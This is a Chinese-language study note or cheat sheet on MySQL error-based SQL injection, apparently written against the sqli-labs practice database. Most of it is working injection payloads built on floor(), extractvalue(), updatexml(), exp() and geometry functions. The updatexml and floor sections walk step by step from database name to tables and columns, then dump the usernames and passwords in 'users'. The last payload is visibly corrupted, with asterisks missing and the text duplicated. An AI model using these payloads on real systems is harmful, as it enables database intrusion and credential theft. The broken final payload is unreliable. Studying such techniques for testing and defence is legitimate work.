报错注入

报错注入一般流程

报错注入的五种函数
全部都以查user()为例子~

1. floor()
   id = 1 and (select 1 from (select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a)

2. extractvalue()
   id = 1 and (extractvalue(1, concat(0x5c,(select user()))))

3. updatexml()
   id = 1 and (updatexml(0x3a,concat(1,(select user())),1))

4. exp()
   id =1 and EXP(~(SELECT * from(select user())a))

5. 有六种函数（但总的来说可以归为一类）
   GeometryCollection()
   id = 1 AND GeometryCollection((select * from (select * from(select user())a)b))
   polygon()
   id =1 AND polygon((select * from(select * from(select user())a)b))
   multipoint()
   id = 1 AND multipoint((select * from(select * from(select user())a)b))
   multilinestring()
   id = 1 AND multilinestring((select * from(select * from(select user())a)b))

linestring()
id = 1 AND LINESTRING((select * from(select * from(select user())a)b))

multipolygon()
id =1 AND multipolygon((select * from(select * from(select user())a)b))

以updatexml为例

1. 爆库
   id=1 and updatexml(1,concat(0x23,database()),1)
   

2. 爆表
   id=1 and updatexml(1,concat(0x23,(select group_concat(table_name) from information_schema.tables where table_schema=‘security’ )),1)

3. 爆字段
   id=1 and updatexml(1,concat(0x23,(select group_concat(column_name) from information_schema.columns where table_schema=‘security’ and table_name=‘users’)),1)

4. 爆内容
   id=1 and
   updatexml(1,concat(0x23,(select group_concat(password,username) from security.users),0x23),1)

以floor为例

1. 爆库id=1 union Select 1,count(*),concat(0x23,0x23,(select database()),0x23,0x23,floor(rand(0)*2))a from information_schema.columns group by a–+
   
2. 爆表id=1 union Select 1,count(*),concat(0x23,0x23,(select count(table_name) from information_schema.tables where table_schema=‘security’ limit 0,1),0x23,0x23,floor(rand(0)*2))a from information_schema.columns group by a–+
   
   表有六个

id=1 union Select 1,count(*),concat(0x23,0x23,(select table_name from information_schema.tables where table_schema=‘security’ limit 0,1),0x23,0x23,floor(rand(0)*2))a from information_schema.columns group by a–+

调整 limit 的参数，将所有表名爆出
id=1 union Select 1,count(*),concat(0x23,0x23,(select table_name from information_schema.tables where table_schema=‘security’ limit 1,1),0x23,0x23,floor(rand(0)*2))a from information_schema.columns group by a–+



我们需要的是users表

3. 爆列名
   id=1 union Select 1,count(*),concat(0x23,0x23,(select count(column_name) from information_schema.columns where table_schema=‘security’ and table_name=‘users’ limit 0,1),0x23,0x23,floor(rand(0)*2))a from information_schema.columns group by a–+
   
   显示为三列

id=1 union Select 1,count(*),concat(0x23,0x23,(select column_name from information_schema.columns where table_schema=‘security’ and table_name=‘users’ limit 0,1),0x23,0x23,floor(rand(0)*2))a from information_schema.columns group by a–+

4. 爆字段
   and(select 1 from(select count(*),concat((select (select (SELECT distinct concat(0x23,username,0x3a,password,0x23) FROM users limit 0,1)) from information_schema.tables limit 0,1),floor(rand(0)2))x from information_schema.tables group by x)a)and(select 1 from(select count(),concat((select (select (SELECT distinct concat(0x23,username,0x3a,password,0x23) FROM users limit 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)